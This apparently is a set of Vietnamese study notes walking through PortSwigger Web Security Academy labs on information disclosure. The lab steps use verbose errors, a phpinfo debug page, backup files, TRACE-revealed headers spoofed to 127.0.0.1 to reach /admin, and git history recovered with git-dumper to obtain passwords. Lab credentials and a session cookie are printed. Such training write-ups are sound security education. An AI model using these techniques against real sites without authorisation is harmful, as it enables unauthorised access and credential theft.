What is Information Disclosure?
Các ví dụ:
Some basic examples of information disclosure are as follows:
- Revealing the names of hidden directories, their structure, and their contents via a `robots.txt` file or directory listing
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behaviorFiles for Web Crawlers
Các file chẳng hạn như /robots.txt và /sitemap.xml có thể chứa thông tin nhạy cảm:
```ad-quote
Many websites provide files at `/robots.txt` and `/sitemap.xml` to help crawlers navigate their site. Among other things, these files often list specific directories that the crawlers should skip, for example, because they may contain sensitive information.Directory Listings
Nếu web server được cấu hình để liệt kê nội dung của các thư mục thì ta có thể dùng nó để xác định đường dẫn của các resource và thậm chí là truy cập vào các file ẩn mà không cần thực hiện directory brute-forcing:
Web servers can be configured to automatically list the contents of directories that do not have an index page present. This can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analyzing and attacking those resources. It particularly increases the exposure of sensitive files within the directory that are not intended to be accessible to users, such as temporary files and crash dumps.Đây không phải là bug do nó chỉ giúp ta tìm được đường dẫn của các resource chứ không hẳn là cho phép ta truy cập vào tất cả các resource:
Directory listings themselves are not necessarily a security vulnerability. However, if the website also fails to implement proper access control, leaking the existence and location of sensitive resources in this way is clearly an issue.Developer Comments
Comment của developer cũng có thể chứa những thông tin nhạy cảm:
During development, in-line HTML comments are sometimes added to the markup.
Occasionally, these comments contain information that is useful to an attacker. For example, they might hint at the existence of hidden directories or provide clues about the application logic.Error Messages
Error message có thể chứa thông tin về kiểu dữ liệu:
The content of error messages can reveal information about what input or data type is expected from a given parameter. This can help you to narrow down your attack by identifying exploitable parameters.Thông tin về công nghệ cũng như là phiên bản của các công nghệ đó có thể giúp ta sử dụng các lỗ hổng đã biết để khai thác:
Verbose error messages can also provide information about different technologies being used by the website. For example, they might explicitly name a template engine, database type, or server that the website is using, along with its version number.
This information can be useful because you can easily search for any documented exploits that may exist for this version. Similarly, you can check whether there are any common configuration errors or dangerous default settings that you may be able to exploit. Some of these may be highlighted in the official documentation.Trong trường hợp ứng dụng sử dụng open-source framework thì ta có thể tìm hiểu mã nguồn nhằm xây dựng exploit:
You might also discover that the website is using some kind of open-source framework. In this case, you can study the publicly available source code, which is an invaluable resource for constructing your own exploits.Lab: Information Disclosure in Error Messages
Gửi request sau:
GET /product?productId=a HTTP/2
Host: 0a2d007c040aed55804b1c9e00490026.web-security-academy.netResponse cho biết rằng server sử dụng Apache Struts 2 2.3.31:
HTTP/2 500 Internal Server Error
Content-Length: 1674
Internal Server Error: java.lang.NumberFormatException: For input string: "a"
at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
at java.base/java.lang.Integer.parseInt(Integer.java:661)
at java.base/java.lang.Integer.parseInt(Integer.java:777)
at lab.i.h.y.n.D(Unknown Source)
at lab.h.o.b.d.u(Unknown Source)
at lab.h.o.e.h.z.c(Unknown Source)
at lab.h.o.e.c.lambda$handleSubRequest$0(Unknown Source)
at f.x.f.x.lambda$null$3(Unknown Source)
at f.x.f.x.Y(Unknown Source)
at f.x.f.x.lambda$uncheckedFunction$4(Unknown Source)
at java.base/java.util.Optional.map(Optional.java:260)
at lab.h.o.e.c.F(Unknown Source)
at lab.server.l.z.z.s(Unknown Source)
at lab.h.o.k.F(Unknown Source)
at lab.h.o.k.s(Unknown Source)
at lab.server.l.z.v.j.s(Unknown Source)
at lab.server.l.z.v.a.lambda$handle$0(Unknown Source)
at lab.i.m.r.x.s(Unknown Source)
at lab.server.l.z.v.a.Y(Unknown Source)
at lab.server.l.z.n.m(Unknown Source)
at f.x.f.x.lambda$null$3(Unknown Source)
at f.x.f.x.Y(Unknown Source)
at f.x.f.x.lambda$uncheckedFunction$4(Unknown Source)
at lab.server.ph.p(Unknown Source)
at lab.server.l.z.n.z(Unknown Source)
at lab.server.l.b.c.W(Unknown Source)
at lab.server.l.u.r(Unknown Source)
at lab.server.l.s.r(Unknown Source)
at lab.server.g.K(Unknown Source)
at lab.server.g.j(Unknown Source)
at lab.z.q.lambda$consume$0(Unknown Source)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
at java.base/java.lang.Thread.run(Thread.java:1583)
Apache Struts 2 2.3.31Debugging Data
Dữ liệu debug đôi khi có thể chứa những thông tin nhạy cảm:
Debug messages can sometimes contain vital information for developing an attack, including:
- Values for key session variables that can be manipulated via user input
- Hostnames and credentials for back-end components
- File and directory names on the server
- Keys used to encrypt data transmitted via the clientDữ liệu này đôi khi có thể được lưu trong một file riêng biệt mà nếu attacker truy cập được thì hắn có thể tìm hiểu về cách thức hoạt động của ứng dụng:
Debugging information may sometimes be logged in a separate file. If an attacker is able to gain access to this file, it can serve as a useful reference for understanding the application's runtime state.Lab: Information Disclosure on Debug Page
Tìm thấy đoạn comment sau ở trong trang /:
<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->Truy cập vào và thấy đây là trang thông tin của PHP:
Tìm được secret key ở phần Environment:
Source Code Disclosure via Backup Files
Truy cập vào source code có thể giúp attacker hiểu hơn về ứng dụng nhằm xây dựng exploit có mức độ nghiêm trọng cao. Ngoài ra, nó còn có thể tiết lộ các dữ liệu nhạy cảm được gán cứng:
Obtaining source code access makes it much easier for an attacker to understand the application's behavior and construct high-severity attacks. Sensitive data is sometimes even hard-coded within the source code. Typical examples of this include API keys and credentials for accessing back-end components.Cách đọc source công thông qua các backup files:
When a server handles files with a particular extension, such as `.php`, it will typically execute the code, rather than simply sending it to the client as text.
However, in some situations, you can trick a website into returning the contents of the file instead. For example, text editors often generate temporary backup files while the original file is being edited. These temporary files are usually indicated in some way, such as by appending a tilde (`~`) to the filename or adding a different file extension. Requesting a code file using a backup file extension can sometimes allow you to read the contents of the file in the response.Việc đọc được source code có thể dẫn đến lỗ hổng Insecure Deserialization:
Once an attacker has access to the source code, this can be a huge step towards being able to identify and exploit additional vulnerabilities that would otherwise be almost impossible. One such example is insecure deserialization.Lab: Source Code Disclosure via Backup Files
Nội dung của /robots.txt để tìm thư mục ẩn1:
User-agent: *
Disallow: /backupTruy cập vào /backup thì thấy web server liệt kê thư mục như đã đề cập ở Directory Listings:
Tìm thấy password của database trong dòng code sau:
ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
"org.postgresql.Driver",
"postgresql",
"localhost",
5432,
"postgres",
"postgres",
"j1h7pr0sb5hw5xzz14e8s8sqm76m9hd9"
).withAutoCommit();Information Disclosure Due to Insecure Configuration
Việc sử dụng các thư viện thứ 3 mà không hiểu rõ các tùy chọn và cấu hình sai cũng có thể gây ra lộ lọt thông tin:
Websites are sometimes vulnerable as a result of improper configuration. This is especially common due to the widespread use of third-party technologies, whose vast array of configuration options are not necessarily well-understood by those implementing them.Ví dụ:
For example, the HTTP `TRACE` method is designed for diagnostic purposes. If enabled, the web server will respond to requests that use the `TRACE` method by echoing in the response the exact request that was received. This behavior is often harmless, but occasionally leads to information disclosure, such as the name of internal authentication headers that may be appended to requests by reverse proxies.Lab: Authentication Bypass via Information Disclosure
Khi truy cập trang /admin thì nhận được thông báo lỗi như sau:
Admin interface only available to local usersSử dụng request có method là TRACE:
TRACE /admin HTTP/2
Host: 0a8100e6047fdb1881486b15009a0071.web-security-academy.net
Cookie: session=2DYbY8WivseEjKMS80TzuuqSUG7yt4TR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0Response có chứa một internal header:
TRACE /admin HTTP/1.1
Host: localhost
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
accept-encoding: gzip, deflate, br
dnt: 1
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: same-origin
sec-fetch-user: ?1
priority: u=0, i
te: trailers
cookie: session=2DYbY8WivseEjKMS80TzuuqSUG7yt4TR
Content-Length: 0
X-Custom-IP-Authorization: 58.186.47.102Kiểm tra thì thấy đây chính là IP của chúng ta: IP Address Lookup - Check Location of Your Public IP. Thử thay giá trị này thành 127.0.0.1 thì truy cập được trang /admin.
Version Control History
Nếu trang web để lộ thư mục .git thì ta có thể dùng nó để đọc các đoạn diff của source code nhằm tìm ra các thông tin nhạy cảm:
There are various methods for downloading the entire `.git` directory. You can then open it using your local installation of Git to gain access to the website's version control history. This may include logs containing committed changes and other interesting information.
This might not give you access to the full source code, but comparing the diff will allow you to read small snippets of code. As with any source code, you might also find sensitive data hard-coded within some of the changed lines.Lab: Information Disclosure in Version Control History
Truy cập .git thì thấy cây thư mục như sau:
Sử dụng tool git-dumper để tải về thư mục .git.
Cấu trúc thư mục:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 4/22/2025 9:44 PM .git
-a--- 4/22/2025 9:42 PM 88 admin_panel.php
-a--- 4/22/2025 9:44 PM 37 admin.confSử dụng lệnh git log thì thấy có 2 commit:
> git log
commit df2d2da9d64d65b73580870e2fb3b4089f5e53ba (HEAD -> master)
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
commit f06fbbfeb511afea2f5e0c5046b31a2de3bc5de1
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panelCheckout đến commit f06fbbfeb511afea2f5e0c5046b31a2de3bc5de1 và xem file admin.conf thì thấy có password:
> cat admin.conf
ADMIN_PASSWORD=zh8wbu8ke4cdcvnk3e29Đăng nhập bằng administrator:zh8wbu8ke4cdcvnk3e29 và xóa user carlos để hoàn thành lab.
Resources
Footnotes
-
: xem thêm Files for Web Crawlers ↩